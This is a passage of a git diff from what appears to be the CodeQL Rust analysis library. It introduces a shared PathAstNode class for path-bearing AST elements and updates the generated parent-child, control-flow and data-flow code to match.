81db1076e2e4921ceb50933b96cd7b574caab1818de257c1e9038f3f97447d59 test/extractor-tests/generated/TuplePat/TuplePat_getField.ql f000bed41af031bc56d0705ce312abe7ab3dc6745b2936798c9938781e51475e f464a84dbc36aa371d60d6db68d6251f6b275dc4ecebdc56f195637be390b067 -test/extractor-tests/generated/TupleStructPat/TupleStructPat.ql 194b2fbfc83a84caf76032f3c63a1f7e618f71e5ea5be449e9d2691b0fce9829 0ff24488ba5729591ce86a702fdfb6f4e0498f96d89bf5c4bd05bd90523f9435 +test/extractor-tests/generated/TupleStructPat/TupleStructPat.ql 967409c7bddd7fc8d0b9fdfab2f5e6c82e8b4ff57020822aa0cda177244dfbc5 eaf0b7e56c38db60fafb39f8de75b67ee1099ac540fa92b5dfe84b601d31781a test/extractor-tests/generated/TupleStructPat/TupleStructPat_getField.ql f3f2e23cc2a32aa5abc1e0fda1300dab1693230632b9eaa75bb3b1e82ee9ea1a 24b87a39ec639a26ff8c1d04dc3429b72266b2a3b1650a06a7cd4387b6f0e615 test/extractor-tests/generated/TupleStructPat/TupleStructPat_getPath.ql 13a06696bbf1fa8d5b73107e28cdba40e93da04b27f9c54381b78a52368d2ad1 5558c35ea9bb371ad90a5b374d7530dd1936f83e6ba656ebfbfd5bd63598e088 test/extractor-tests/generated/TupleStructPat/TupleStructPat_getResolvedCrateOrigin.ql e409667233331a038e482de4b2669d9fac9d7eb0e3bd5580ea19828f0c4ed7ad 588e4628471f1004575900d7365490efcf9168b555ff26becfc3f27b9e657de3 diff --git a/rust/ql/.gitattributes b/rust/ql/.gitattributes index 973f32e7d9b..68cfe403c89 100644 --- a/rust/ql/.gitattributes +++ b/rust/ql/.gitattributes @@ -104,6 +104,7 @@ /lib/codeql/rust/elements/ParenType.qll linguist-generated /lib/codeql/rust/elements/Pat.qll linguist-generated /lib/codeql/rust/elements/Path.qll linguist-generated +/lib/codeql/rust/elements/PathAstNode.qll linguist-generated /lib/codeql/rust/elements/PathExpr.qll linguist-generated /lib/codeql/rust/elements/PathExprBase.qll linguist-generated /lib/codeql/rust/elements/PathPat.qll linguist-generated @@ -303,6 +304,7 @@ /lib/codeql/rust/elements/internal/ParenPatConstructor.qll linguist-generated /lib/codeql/rust/elements/internal/ParenTypeConstructor.qll linguist-generated /lib/codeql/rust/elements/internal/PatImpl.qll linguist-generated +/lib/codeql/rust/elements/internal/PathAstNodeImpl.qll linguist-generated /lib/codeql/rust/elements/internal/PathConstructor.qll linguist-generated /lib/codeql/rust/elements/internal/PathExprBaseImpl.qll linguist-generated /lib/codeql/rust/elements/internal/PathExprConstructor.qll linguist-generated @@ -516,6 +518,7 @@ /lib/codeql/rust/elements/internal/generated/ParentChild.qll linguist-generated /lib/codeql/rust/elements/internal/generated/Pat.qll linguist-generated /lib/codeql/rust/elements/internal/generated/Path.qll linguist-generated +/lib/codeql/rust/elements/internal/generated/PathAstNode.qll linguist-generated /lib/codeql/rust/elements/internal/generated/PathExpr.qll linguist-generated /lib/codeql/rust/elements/internal/generated/PathExprBase.qll linguist-generated /lib/codeql/rust/elements/internal/generated/PathPat.qll linguist-generated @@ -728,8 +731,6 @@ /test/extractor-tests/generated/FormatArgsExpr/FormatArgument.ql linguist-generated /test/extractor-tests/generated/FormatArgsExpr/FormatArgument_getVariable.ql linguist-generated /test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess.ql linguist-generated -/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess_getResolvedCrateOrigin.ql linguist-generated -/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess_getResolvedPath.ql linguist-generated /test/extractor-tests/generated/FormatArgsExpr/Format_getArgument.ql linguist-generated /test/extractor-tests/generated/Function/Function.ql linguist-generated /test/extractor-tests/generated/Function/Function_getAbi.ql linguist-generated diff --git a/rust/ql/lib/codeql/rust/controlflow/internal/generated/CfgNodes.qll b/rust/ql/lib/codeql/rust/controlflow/internal/generated/CfgNodes.qll index 1c3afbc83b0..fd5bdf320d3 100644 --- a/rust/ql/lib/codeql/rust/controlflow/internal/generated/CfgNodes.qll +++ b/rust/ql/lib/codeql/rust/controlflow/internal/generated/CfgNodes.qll @@ -2060,16 +2060,6 @@ module MakeCfgNodes Input> { * Gets the number of attrs of this path expression. */ int getNumberOfAttrs() { result = count(int i | exists(this.getAttr(i))) } - - /** - * Gets the path of this path expression, if it exists. - */ - Path getPath() { result = node.getPath() } - - /** - * Holds if `getPath()` exists. - */ - predicate hasPath() { exists(this.getPath()) } } final private class ParentPathExprBase extends ParentAstNode, PathExprBase { @@ -2108,16 +2098,6 @@ module MakeCfgNodes Input> { /** Gets the underlying `PathPat`. */ PathPat getPathPat() { result = node } - - /** - * Gets the path of this path pat, if it exists. - */ - Path getPath() { result = node.getPath() } - - /** - * Holds if `getPath()` exists. - */ - predicate hasPath() { exists(this.getPath()) } } final private class ParentPrefixExpr extends ParentAstNode, PrefixExpr { @@ -2345,16 +2325,6 @@ module MakeCfgNodes Input> { /** Gets the underlying `RecordExpr`. */ RecordExpr getRecordExpr() { result = node } - /** - * Gets the path of this record expression, if it exists. - */ - Path getPath() { result = node.getPath() } - - /** - * Holds if `getPath()` exists. - */ - predicate hasPath() { exists(this.getPath()) } - /** * Gets the record expression field list of this record expression, if it exists. */ @@ -2387,16 +2357,6 @@ module MakeCfgNodes Input> { /** Gets the underlying `RecordPat`. */ RecordPat getRecordPat() { result = node } - /** - * Gets the path of this record pat, if it exists. - */ - Path getPath() { result = node.getPath() } - - /** - * Holds if `getPath()` exists. - */ - predicate hasPath() { exists(this.getPath()) } - /** * Gets the record pat field list of this record pat, if it exists. */ @@ -2889,16 +2849,6 @@ module MakeCfgNodes Input> { * Gets the number of fields of this tuple struct pat. */ int getNumberOfFields() { result = count(int i | exists(this.getField(i))) } - - /** - * Gets the path of this tuple struct pat, if it exists. - */ - Path getPath() { result = node.getPath() } - - /** - * Holds if `getPath()` exists. - */ - predicate hasPath() { exists(this.getPath()) } } final private class ParentUnderscoreExpr extends ParentAstNode, UnderscoreExpr { diff --git a/rust/ql/lib/codeql/rust/dataflow/internal/DataFlowImpl.qll b/rust/ql/lib/codeql/rust/dataflow/internal/DataFlowImpl.qll index 4de9842d54f..2103579291b 100644 --- a/rust/ql/lib/codeql/rust/dataflow/internal/DataFlowImpl.qll +++ b/rust/ql/lib/codeql/rust/dataflow/internal/DataFlowImpl.qll @@ -598,31 +598,33 @@ module RustDataFlow implements InputSig { predicate jumpStep(Node node1, Node node2) { none() } /** Holds if path `p` resolves to variant `v`. */ - private predicate pathResolveToVariantCanonicalPath(Path p, VariantCanonicalPath v) { - exists(CrateOriginOption crate, string path | - resolveExtendedCanonicalPath(p.getQualifier(), crate, path) and - v = MkVariantCanonicalPath(crate, path, p.getPart().getNameRef().getText()) + private predicate pathResolveToVariantCanonicalPath(PathAstNode p, VariantCanonicalPath v) { + exists(CrateOriginOption crate, string path, string name | + // TODO: this is bad, but will be solved by moving to semantic paths away from strings + resolveExtendedCanonicalPath(p, crate, path + "::" + name) and + v = MkVariantCanonicalPath(crate, path, name) ) or // TODO: Remove once library types are extracted - not p.hasQualifier() and - v = MkVariantCanonicalPath(_, "crate::std::option::Option", p.getPart().getNameRef().getText()) - or - // TODO: Remove once library types are extracted - not p.hasQualifier() and - v = MkVariantCanonicalPath(_, "crate::std::result::Result", p.getPart().getNameRef().getText()) + exists(Path path | + path = p.getPath() and + not path.hasQualifier() and + v = + MkVariantCanonicalPath(_, ["crate::std::option::Option", "crate::std::result::Result"], + path.getPart().getNameRef().getText()) + ) } /** Holds if `p` destructs an enum variant `v`. */ pragma[nomagic] private predicate tupleVariantDestruction(TupleStructPat p, VariantCanonicalPath v) { - pathResolveToVariantCanonicalPath(p.getPath(), v) + pathResolveToVariantCanonicalPath(p, v) } /** Holds if `p` destructs an enum variant `v`. */ pragma[nomagic] private predicate recordVariantDestruction(RecordPat p, VariantCanonicalPath v) { - pathResolveToVariantCanonicalPath(p.getPath(), v) + pathResolveToVariantCanonicalPath(p, v) } /** @@ -651,13 +653,13 @@ module RustDataFlow implements InputSig { /** Holds if `ce` constructs an enum value of type `v`. */ pragma[nomagic] private predicate tupleVariantConstruction(CallExpr ce, VariantCanonicalPath v) { - pathResolveToVariantCanonicalPath(ce.getFunction().(PathExpr).getPath(), v) + pathResolveToVariantCanonicalPath(ce.getFunction().(PathExpr), v) } /** Holds if `re` constructs an enum value of type `v`. */ pragma[nomagic] private predicate recordVariantConstruction(RecordExpr re, VariantCanonicalPath v) { - pathResolveToVariantCanonicalPath(re.getPath(), v) + pathResolveToVariantCanonicalPath(re, v) } /** diff --git a/rust/ql/lib/codeql/rust/elements.qll b/rust/ql/lib/codeql/rust/elements.qll index e37dde90d61..dba1e446054 100644 --- a/rust/ql/lib/codeql/rust/elements.qll +++ b/rust/ql/lib/codeql/rust/elements.qll @@ -106,6 +106,7 @@ import codeql.rust.elements.ParenPat import codeql.rust.elements.ParenType import codeql.rust.elements.Pat import codeql.rust.elements.Path +import codeql.rust.elements.PathAstNode import codeql.rust.elements.PathExpr import codeql.rust.elements.PathExprBase import codeql.rust.elements.PathPat diff --git a/rust/ql/lib/codeql/rust/elements/PathAstNode.qll b/rust/ql/lib/codeql/rust/elements/PathAstNode.qll new file mode 100644 index 00000000000..c8ff02e634c --- /dev/null +++ b/rust/ql/lib/codeql/rust/elements/PathAstNode.qll @@ -0,0 +1,13 @@ +// generated by codegen, do not edit +/** + * This module provides the public class `PathAstNode`. + */ + +private import internal.PathAstNodeImpl +import codeql.rust.elements.Path +import codeql.rust.elements.Resolvable + +/** + * An AST element wrapping a path (`PathExpr`, `RecordExpr`, `PathPat`, `RecordPat`, `TupleStructPat`). + */ +final class PathAstNode = Impl::PathAstNode; diff --git a/rust/ql/lib/codeql/rust/elements/PathExpr.qll b/rust/ql/lib/codeql/rust/elements/PathExpr.qll index e1bf10488e3..5c768530e21 100644 --- a/rust/ql/lib/codeql/rust/elements/PathExpr.qll +++ b/rust/ql/lib/codeql/rust/elements/PathExpr.qll @@ -5,7 +5,7 @@ private import internal.PathExprImpl import codeql.rust.elements.Attr -import codeql.rust.elements.Path +import codeql.rust.elements.PathAstNode import codeql.rust.elements.PathExprBase /** diff --git a/rust/ql/lib/codeql/rust/elements/PathExprBase.qll b/rust/ql/lib/codeql/rust/elements/PathExprBase.qll index 95fd48d6386..e2e45e718f0 100644 --- a/rust/ql/lib/codeql/rust/elements/PathExprBase.qll +++ b/rust/ql/lib/codeql/rust/elements/PathExprBase.qll @@ -5,7 +5,6 @@ private import internal.PathExprBaseImpl import codeql.rust.elements.Expr -import codeql.rust.elements.Resolvable /** * A path expression or a variable access in a formatting template. See `PathExpr` and `FormatTemplateVariableAccess` for further details. diff --git a/rust/ql/lib/codeql/rust/elements/PathPat.qll b/rust/ql/lib/codeql/rust/elements/PathPat.qll index 2c360a2b858..ae61b5e93e8 100644 --- a/rust/ql/lib/codeql/rust/elements/PathPat.qll +++ b/rust/ql/lib/codeql/rust/elements/PathPat.qll @@ -5,8 +5,7 @@ private import internal.PathPatImpl import codeql.rust.elements.Pat -import codeql.rust.elements.Path -import codeql.rust.elements.Resolvable +import codeql.rust.elements.PathAstNode /** * A path pattern. For example: diff --git a/rust/ql/lib/codeql/rust/elements/RecordExpr.qll b/rust/ql/lib/codeql/rust/elements/RecordExpr.qll index c993059e977..3429ff3597e 100644 --- a/rust/ql/lib/codeql/rust/elements/RecordExpr.qll +++ b/rust/ql/lib/codeql/rust/elements/RecordExpr.qll @@ -5,9 +5,8 @@ private import internal.RecordExprImpl import codeql.rust.elements.Expr -import codeql.rust.elements.Path +import codeql.rust.elements.PathAstNode import codeql.rust.elements.RecordExprFieldList -import codeql.rust.elements.Resolvable /** * A record expression. For example: diff --git a/rust/ql/lib/codeql/rust/elements/RecordPat.qll b/rust/ql/lib/codeql/rust/elements/RecordPat.qll index fb37a42659b..242b7398696 100644 --- a/rust/ql/lib/codeql/rust/elements/RecordPat.qll +++ b/rust/ql/lib/codeql/rust/elements/RecordPat.qll @@ -5,9 +5,8 @@ private import internal.RecordPatImpl import codeql.rust.elements.Pat -import codeql.rust.elements.Path +import codeql.rust.elements.PathAstNode import codeql.rust.elements.RecordPatFieldList -import codeql.rust.elements.Resolvable /** * A record pattern. For example: diff --git a/rust/ql/lib/codeql/rust/elements/Resolvable.qll b/rust/ql/lib/codeql/rust/elements/Resolvable.qll index 200809dd852..6a2304a3be7 100644 --- a/rust/ql/lib/codeql/rust/elements/Resolvable.qll +++ b/rust/ql/lib/codeql/rust/elements/Resolvable.qll @@ -7,6 +7,6 @@ private import internal.ResolvableImpl import codeql.rust.elements.AstNode /** - * Either a `PathExpr`, a `PathPat`, or a `MethodCallExpr`. + * One of `PathExpr`, `RecordExpr`, `PathPat`, `RecordPat`, `TupleStructPat` or `MethodCallExpr`. */ final class Resolvable = Impl::Resolvable; diff --git a/rust/ql/lib/codeql/rust/elements/TupleStructPat.qll b/rust/ql/lib/codeql/rust/elements/TupleStructPat.qll index 5470d18d35a..82c5aa4c0dd 100644 --- a/rust/ql/lib/codeql/rust/elements/TupleStructPat.qll +++ b/rust/ql/lib/codeql/rust/elements/TupleStructPat.qll @@ -5,8 +5,7 @@ private import internal.TupleStructPatImpl import codeql.rust.elements.Pat -import codeql.rust.elements.Path -import codeql.rust.elements.Resolvable +import codeql.rust.elements.PathAstNode /** * A tuple struct pattern. For example: diff --git a/rust/ql/lib/codeql/rust/elements/internal/PathAstNodeImpl.qll b/rust/ql/lib/codeql/rust/elements/internal/PathAstNodeImpl.qll new file mode 100644 index 00000000000..30ad03a4724 --- /dev/null +++ b/rust/ql/lib/codeql/rust/elements/internal/PathAstNodeImpl.qll @@ -0,0 +1,19 @@ +// generated by codegen, remove this comment if you wish to edit this file +/** + * This module provides a hand-modifiable wrapper around the generated class `PathAstNode`. + * + * INTERNAL: Do not use. + */ + +private import codeql.rust.elements.internal.generated.PathAstNode + +/** + * INTERNAL: This module contains the customizable definition of `PathAstNode` and should not + * be referenced directly. + */ +module Impl { + /** + * An AST element wrapping a path (`PathExpr`, `RecordExpr`, `PathPat`, `RecordPat`, `TupleStructPat`). + */ + class PathAstNode extends Generated::PathAstNode { } +} diff --git a/rust/ql/lib/codeql/rust/elements/internal/ResolvableImpl.qll b/rust/ql/lib/codeql/rust/elements/internal/ResolvableImpl.qll index eacd777c7e2..86304cd23de 100644 --- a/rust/ql/lib/codeql/rust/elements/internal/ResolvableImpl.qll +++ b/rust/ql/lib/codeql/rust/elements/internal/ResolvableImpl.qll @@ -15,7 +15,7 @@ module Impl { // the following QLdoc is generated: if you need to edit it, do it in the schema file /** - * Either a `PathExpr`, a `PathPat`, or a `MethodCallExpr`. + * One of `PathExpr`, `RecordExpr`, `PathPat`, `RecordPat`, `TupleStructPat` or `MethodCallExpr`. */ class Resolvable extends Generated::Resolvable { /** diff --git a/rust/ql/lib/codeql/rust/elements/internal/generated/ParentChild.qll b/rust/ql/lib/codeql/rust/elements/internal/generated/ParentChild.qll index aabbb0668d8..44faa061dae 100644 --- a/rust/ql/lib/codeql/rust/elements/internal/generated/ParentChild.qll +++ b/rust/ql/lib/codeql/rust/elements/internal/generated/ParentChild.qll @@ -2185,45 +2185,40 @@ private module Impl { ) } - private Element getImmediateChildOfPathExprBase( - PathExprBase e, int index, string partialPredicateCall + private Element getImmediateChildOfPathAstNode( + PathAstNode e, int index, string partialPredicateCall ) { - exists(int b, int bExpr, int bResolvable, int n | + exists(int b, int bResolvable, int n, int nPath | b = 0 and - bExpr = b + 1 + max(int i | i = -1 or exists(getImmediateChildOfExpr(e, i, _)) | i) and bResolvable = - bExpr + 1 + max(int i | i = -1 or exists(getImmediateChildOfResolvable(e, i, _)) | i) and - n = bResolvable and - ( - none() - or - result = getImmediateChildOfExpr(e, index - b, partialPredicateCall) - or - result = getImmediateChildOfResolvable(e, index - bExpr, partialPredicateCall) - ) - ) - } - - private Element getImmediateChildOfPathPat(PathPat e, int index, string partialPredicateCall) { - exists(int b, int bPat, int bResolvable, int n, int nPath | - b = 0 and - bPat = b + 1 + max(int i | i = -1 or exists(getImmediateChildOfPat(e, i, _)) | i) and - bResolvable = - bPat + 1 + max(int i | i = -1 or exists(getImmediateChildOfResolvable(e, i, _)) | i) and + b + 1 + max(int i | i = -1 or exists(getImmediateChildOfResolvable(e, i, _)) | i) and n = bResolvable and nPath = n + 1 and ( none() or - result = getImmediateChildOfPat(e, index - b, partialPredicateCall) - or - result = getImmediateChildOfResolvable(e, index - bPat, partialPredicateCall) + result = getImmediateChildOfResolvable(e, index - b, partialPredicateCall) or index = n and result = e.getPath() and partialPredicateCall = "Path()" ) ) } + private Element getImmediateChildOfPathExprBase( + PathExprBase e, int index, string partialPredicateCall + ) { + exists(int b, int bExpr, int n | + b = 0 and + bExpr = b + 1 + max(int i | i = -1 or exists(getImmediateChildOfExpr(e, i, _)) | i) and + n = bExpr and + ( + none() + or + result = getImmediateChildOfExpr(e, index - b, partialPredicateCall) + ) + ) + } + private Element getImmediateChildOfPathType(PathType e, int index, string partialPredicateCall) { exists(int b, int bTypeRef, int n, int nPath | b = 0 and @@ -2318,31 +2313,6 @@ private module Impl { ) } - private Element getImmediateChildOfRecordExpr(RecordExpr e, int index, string partialPredicateCall) { - exists(int b, int bExpr, int bResolvable, int n, int nPath, int nRecordExprFieldList | - b = 0 and - bExpr = b + 1 + max(int i | i = -1 or exists(getImmediateChildOfExpr(e, i, _)) | i) and - bResolvable = - bExpr + 1 + max(int i | i = -1 or exists(getImmediateChildOfResolvable(e, i, _)) | i) and - n = bResolvable and - nPath = n + 1 and - nRecordExprFieldList = nPath + 1 and - ( - none() - or - result = getImmediateChildOfExpr(e, index - b, partialPredicateCall) - or - result = getImmediateChildOfResolvable(e, index - bExpr, partialPredicateCall) - or - index = n and result = e.getPath() and partialPredicateCall = "Path()" - or - index = nPath and - result = e.getRecordExprFieldList() and - partialPredicateCall = "RecordExprFieldList()" - ) - ) - } - private Element getImmediateChildOfRecordFieldList( RecordFieldList e, int index, string partialPredicateCall ) { @@ -2362,31 +2332,6 @@ private module Impl { ) } - private Element getImmediateChildOfRecordPat(RecordPat e, int index, string partialPredicateCall) { - exists(int b, int bPat, int bResolvable, int n, int nPath, int nRecordPatFieldList | - b = 0 and - bPat = b + 1 + max(int i | i = -1 or exists(getImmediateChildOfPat(e, i, _)) | i) and - bResolvable = - bPat + 1 + max(int i | i = -1 or exists(getImmediateChildOfResolvable(e, i, _)) | i) and - n = bResolvable and - nPath = n + 1 and - nRecordPatFieldList = nPath + 1 and - ( - none() - or - result = getImmediateChildOfPat(e, index - b, partialPredicateCall) - or - result = getImmediateChildOfResolvable(e, index - bPat, partialPredicateCall) - or - index = n and result = e.getPath() and partialPredicateCall = "Path()" - or - index = nPath and - result = e.getRecordPatFieldList() and - partialPredicateCall = "RecordPatFieldList()" - ) - ) - } - private Element getImmediateChildOfRefExpr(RefExpr e, int index, string partialPredicateCall) { exists(int b, int bExpr, int n, int nAttr, int nExpr | b = 0 and @@ -2608,32 +2553,6 @@ private module Impl { ) } - private Element getImmediateChildOfTupleStructPat( - TupleStructPat e, int index, string partialPredicateCall - ) { - exists(int b, int bPat, int bResolvable, int n, int nField, int nPath | - b = 0 and - bPat = b + 1 + max(int i | i = -1 or exists(getImmediateChildOfPat(e, i, _)) | i) and - bResolvable = - bPat + 1 + max(int i | i = -1 or exists(getImmediateChildOfResolvable(e, i, _)) | i) and - n = bResolvable and - nField = n + 1 + max(int i | i = -1 or exists(e.getField(i)) | i) and - nPath = nField + 1 and - ( - none() - or - result = getImmediateChildOfPat(e, index - b, partialPredicateCall) - or - result = getImmediateChildOfResolvable(e, index - bPat, partialPredicateCall) - or - result = e.getField(index - n) and - partialPredicateCall = "Field(" + (index - n).toString() + ")" - or - index = nField and result = e.getPath() and partialPredicateCall = "Path()" - ) - ) - } - private Element getImmediateChildOfTupleType(TupleType e, int index, string partialPredicateCall) { exists(int b, int bTypeRef, int n, int nField | b = 0 and @@ -3253,22 +3172,85 @@ private module Impl { } private Element getImmediateChildOfPathExpr(PathExpr e, int index, string partialPredicateCall) { - exists(int b, int bPathExprBase, int n, int nAttr, int nPath | + exists(int b, int bPathExprBase, int bPathAstNode, int n, int nAttr | b = 0 and bPathExprBase = b + 1 + max(int i | i = -1 or exists(getImmediateChildOfPathExprBase(e, i, _)) | i) and - n = bPathExprBase and + bPathAstNode = + bPathExprBase + 1 + + max(int i | i = -1 or exists(getImmediateChildOfPathAstNode(e, i, _)) | i) and + n = bPathAstNode and nAttr = n + 1 + max(int i | i = -1 or exists(e.getAttr(i)) | i) and - nPath = nAttr + 1 and ( none() or result = getImmediateChildOfPathExprBase(e, index - b, partialPredicateCall) or + result = getImmediateChildOfPathAstNode(e, index - bPathExprBase, partialPredicateCall) + or result = e.getAttr(index - n) and partialPredicateCall = "Attr(" + (index - n).toString() + ")" + ) + ) + } + + private Element getImmediateChildOfPathPat(PathPat e, int index, string partialPredicateCall) { + exists(int b, int bPat, int bPathAstNode, int n | + b = 0 and + bPat = b + 1 + max(int i | i = -1 or exists(getImmediateChildOfPat(e, i, _)) | i) and + bPathAstNode = + bPat + 1 + max(int i | i = -1 or exists(getImmediateChildOfPathAstNode(e, i, _)) | i) and + n = bPathAstNode and + ( + none() or - index = nAttr and result = e.getPath() and partialPredicateCall = "Path()" + result = getImmediateChildOfPat(e, index - b, partialPredicateCall) + or + result = getImmediateChildOfPathAstNode(e, index - bPat, partialPredicateCall) + ) + ) + } + + private Element getImmediateChildOfRecordExpr(RecordExpr e, int index, string partialPredicateCall) { + exists(int b, int bExpr, int bPathAstNode, int n, int nRecordExprFieldList | + b = 0 and + bExpr = b + 1 + max(int i | i = -1 or exists(getImmediateChildOfExpr(e, i, _)) | i) and + bPathAstNode = + bExpr + 1 + max(int i | i = -1 or exists(getImmediateChildOfPathAstNode(e, i, _)) | i) and + n = bPathAstNode and + nRecordExprFieldList = n + 1 and + ( + none() + or + result = getImmediateChildOfExpr(e, index - b, partialPredicateCall) + or + result = getImmediateChildOfPathAstNode(e, index - bExpr, partialPredicateCall) + or + index = n and + result = e.getRecordExprFieldList() and + partialPredicateCall = "RecordExprFieldList()" + ) + ) + } + + private Element getImmediateChildOfRecordPat(RecordPat e, int index, string partialPredicateCall) { + exists(int b, int bPat, int bPathAstNode, int n, int nRecordPatFieldList | + b = 0 and + bPat = b + 1 + max(int i | i = -1 or exists(getImmediateChildOfPat(e, i, _)) | i) and + bPathAstNode = + bPat + 1 + max(int i | i = -1 or exists(getImmediateChildOfPathAstNode(e, i, _)) | i) and + n = bPathAstNode and + nRecordPatFieldList = n + 1 and + ( + none() + or + result = getImmediateChildOfPat(e, index - b, partialPredicateCall) + or + result = getImmediateChildOfPathAstNode(e, index - bPat, partialPredicateCall) + or + index = n and + result = e.getRecordPatFieldList() and + partialPredicateCall = "RecordPatFieldList()" ) ) } @@ -3433,6 +3415,29 @@ private module Impl { ) } + private Element getImmediateChildOfTupleStructPat( + TupleStructPat e, int index, string partialPredicateCall + ) { + exists(int b, int bPat, int bPathAstNode, int n, int nField | + b = 0 and + bPat = b + 1 + max(int i | i = -1 or exists(getImmediateChildOfPat(e, i, _)) | i) and + bPathAstNode = + bPat + 1 + max(int i | i = -1 or exists(getImmediateChildOfPathAstNode(e, i, _)) | i) and + n = bPathAstNode and + nField = n + 1 + max(int i | i = -1 or exists(e.getField(i)) | i) and + ( + none() + or + result = getImmediateChildOfPat(e, index - b, partialPredicateCall) + or + result = getImmediateChildOfPathAstNode(e, index - bPat, partialPredicateCall) + or + result = e.getField(index - n) and + partialPredicateCall = "Field(" + (index - n).toString() + ")" + ) + ) + } + private Element getImmediateChildOfTypeAlias(TypeAlias e, int index, string partialPredicateCall) { exists( int b, int bAssocItem, int bExternItem, int bItem, int n, int nAttr, int nGenericParamList, @@ -3803,8 +3808,6 @@ private module Impl { or result = getImmediateChildOfParenType(e, index, partialAccessor) or - result = getImmediateChildOfPathPat(e, index, partialAccessor) - or result = getImmediateChildOfPathType(e, index, partialAccessor) or result = getImmediateChildOfPrefixExpr(e, index, partialAccessor) @@ -3815,12 +3818,8 @@ private module Impl { or result = getImmediateChildOfRangePat(e, index, partialAccessor) or - result = getImmediateChildOfRecordExpr(e, index, partialAccessor) - or result = getImmediateChildOfRecordFieldList(e, index, partialAccessor) or - result = getImmediateChildOfRecordPat(e, index, partialAccessor) - or result = getImmediateChildOfRefExpr(e, index, partialAccessor) or result = getImmediateChildOfRefPat(e, index, partialAccessor) @@ -3845,8 +3844,6 @@ private module Impl { or result = getImmediateChildOfTuplePat(e, index, partialAccessor) or - result = getImmediateChildOfTupleStructPat(e, index, partialAccessor) - or result = getImmediateChildOfTupleType(e, index, partialAccessor) or result = getImmediateChildOfTypeArg(e, index, partialAccessor) @@ -3893,6 +3890,12 @@ private module Impl { or result = getImmediateChildOfPathExpr(e, index, partialAccessor) or + result = getImmediateChildOfPathPat(e, index, partialAccessor) + or + result = getImmediateChildOfRecordExpr(e, index, partialAccessor) + or + result = getImmediateChildOfRecordPat(e, index, partialAccessor) + or result = getImmediateChildOfStatic(e, index, partialAccessor) or result = getImmediateChildOfStruct(e, index, partialAccessor) @@ -3901,6 +3904,8 @@ private module Impl { or result = getImmediateChildOfTraitAlias(e, index, partialAccessor) or + result = getImmediateChildOfTupleStructPat(e, index, partialAccessor) + or result = getImmediateChildOfTypeAlias(e, index, partialAccessor) or result = getImmediateChildOfUnion(e, index, partialAccessor) diff --git a/rust/ql/lib/codeql/rust/elements/internal/generated/PathAstNode.qll b/rust/ql/lib/codeql/rust/elements/internal/generated/PathAstNode.qll new file mode 100644 index 00000000000..a69957e7545 --- /dev/null +++ b/rust/ql/lib/codeql/rust/elements/internal/generated/PathAstNode.qll @@ -0,0 +1,36 @@ +// generated by codegen, do not edit +/** + * This module provides the generated definition of `PathAstNode`. + * INTERNAL: Do not import directly. + */ + +private import codeql.rust.elements.internal.generated.Synth +private import codeql.rust.elements.internal.generated.Raw +import codeql.rust.elements.Path +import codeql.rust.elements.internal.ResolvableImpl::Impl as ResolvableImpl + +/** + * INTERNAL: This module contains the fully generated definition of `PathAstNode` and should not + * be referenced directly. + */ +module Generated { + /** + * An AST element wrapping a path (`PathExpr`, `RecordExpr`, `PathPat`, `RecordPat`, `TupleStructPat`). + * INTERNAL: Do not reference the `Generated::PathAstNode` class directly. + * Use the subclass `PathAstNode`, where the following predicates are available. + */ + class PathAstNode extends Synth::TPathAstNode, ResolvableImpl::Resolvable { + /** + * Gets the path of this path ast node, if it exists. + */ + Path getPath() { + result = + Synth::convertPathFromRaw(Synth::convertPathAstNodeToRaw(this).(Raw::PathAstNode).getPath()) + } + + /** + * Holds if `getPath()` exists. + */ + final predicate hasPath() { exists(this.getPath()) } + } +} diff --git a/rust/ql/lib/codeql/rust/elements/internal/generated/PathExpr.qll b/rust/ql/lib/codeql/rust/elements/internal/generated/PathExpr.qll index 562747d0f11..dbf2c9004da 100644 --- a/rust/ql/lib/codeql/rust/elements/internal/generated/PathExpr.qll +++ b/rust/ql/lib/codeql/rust/elements/internal/generated/PathExpr.qll @@ -7,7 +7,7 @@ private import codeql.rust.elements.internal.generated.Synth private import codeql.rust.elements.internal.generated.Raw import codeql.rust.elements.Attr -import codeql.rust.elements.Path +import codeql.rust.elements.internal.PathAstNodeImpl::Impl as PathAstNodeImpl import codeql.rust.elements.internal.PathExprBaseImpl::Impl as PathExprBaseImpl /** @@ -26,7 +26,9 @@ module Generated { * INTERNAL: Do not reference the `Generated::PathExpr` class directly. * Use the subclass `PathExpr`, where the following predicates are available. */ - class PathExpr extends Synth::TPathExpr, PathExprBaseImpl::PathExprBase { + class PathExpr extends Synth::TPathExpr, PathExprBaseImpl::PathExprBase, + PathAstNodeImpl::PathAstNode + { override string getAPrimaryQlClass() { result = "PathExpr" } /** @@ -46,18 +48,5 @@ module Generated { * Gets the number of attrs of this path expression. */ final int getNumberOfAttrs() { result = count(int i | exists(this.getAttr(i))) } - - /** - * Gets the path of this path expression, if it exists. - */ - Path getPath() { - result = - Synth::convertPathFromRaw(Synth::convertPathExprToRaw(this).(Raw::PathExpr).getPath()) - } - - /** - * Holds if `getPath()` exists. - */ - final predicate hasPath() { exists(this.getPath()) } } } diff --git a/rust/ql/lib/codeql/rust/elements/internal/generated/PathExprBase.qll b/rust/ql/lib/codeql/rust/elements/internal/generated/PathExprBase.qll index 2efc1fd3dae..cf924962dbe 100644 --- a/rust/ql/lib/codeql/rust/elements/internal/generated/PathExprBase.qll +++ b/rust/ql/lib/codeql/rust/elements/internal/generated/PathExprBase.qll @@ -7,7 +7,6 @@ private import codeql.rust.elements.internal.generated.Synth private import codeql.rust.elements.internal.generated.Raw import codeql.rust.elements.internal.ExprImpl::Impl as ExprImpl -import codeql.rust.elements.internal.ResolvableImpl::Impl as ResolvableImpl /** * INTERNAL: This module contains the fully generated definition of `PathExprBase` and should not @@ -19,5 +18,5 @@ module Generated { * INTERNAL: Do not reference the `Generated::PathExprBase` class directly. * Use the subclass `PathExprBase`, where the following predicates are available. */ - class PathExprBase extends Synth::TPathExprBase, ExprImpl::Expr, ResolvableImpl::Resolvable { } + class PathExprBase extends Synth::TPathExprBase, ExprImpl::Expr { } } diff --git a/rust/ql/lib/codeql/rust/elements/internal/generated/PathPat.qll b/rust/ql/lib/codeql/rust/elements/internal/generated/PathPat.qll index e37e1e154db..3e69bb2cb32 100644 --- a/rust/ql/lib/codeql/rust/elements/internal/generated/PathPat.qll +++ b/rust/ql/lib/codeql/rust/elements/internal/generated/PathPat.qll @@ -7,8 +7,7 @@ private import codeql.rust.elements.internal.generated.Synth private import 